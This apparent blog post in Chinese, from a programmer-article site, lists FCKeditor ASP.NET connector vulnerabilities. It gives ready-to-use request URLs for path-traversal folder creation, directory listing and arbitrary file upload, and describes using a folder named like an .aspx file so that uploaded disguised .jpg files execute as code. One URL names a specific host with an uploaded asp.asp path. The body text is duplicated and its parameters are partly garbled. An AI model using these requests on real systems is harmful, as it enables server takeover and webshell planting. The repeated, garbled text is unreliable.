FCKeditor 新闻组件的一些程序漏洞
程序员文章站
2022-06-16 19:38:32
1 currentfolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录 /browser/default/connector...
1 currentfolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
/browser/default/connectors/aspx/connector.aspx?command=createfolder&type=image¤tfolder=../../..%2f&newfoldername=aspx.asp
2 currentfolder 参数,根据返回的xml信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过xml返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image¤tfolder=%2f
3 上传文件时,通过修改currentfolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?command=fileupload&type=image¤tfolder=%2f
4 同时修改type 和currentfolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?command=fileupload&type=image¤tfolder=%2f
http://samsungfriend.local.opentide.com.cn/upload/fckroots/image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
/browser/default/connectors/aspx/connector.aspx?command=createfolder&type=image¤tfolder=../../..%2f&newfoldername=aspx.asp
2 currentfolder 参数,根据返回的xml信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过xml返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image¤tfolder=%2f
3 上传文件时,通过修改currentfolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?command=fileupload&type=image¤tfolder=%2f
4 同时修改type 和currentfolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?command=fileupload&type=image¤tfolder=%2f
http://samsungfriend.local.opentide.com.cn/upload/fckroots/image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
上一篇: Yii框架组件的事件机制原理与用法分析
下一篇: GIt的基本操作详解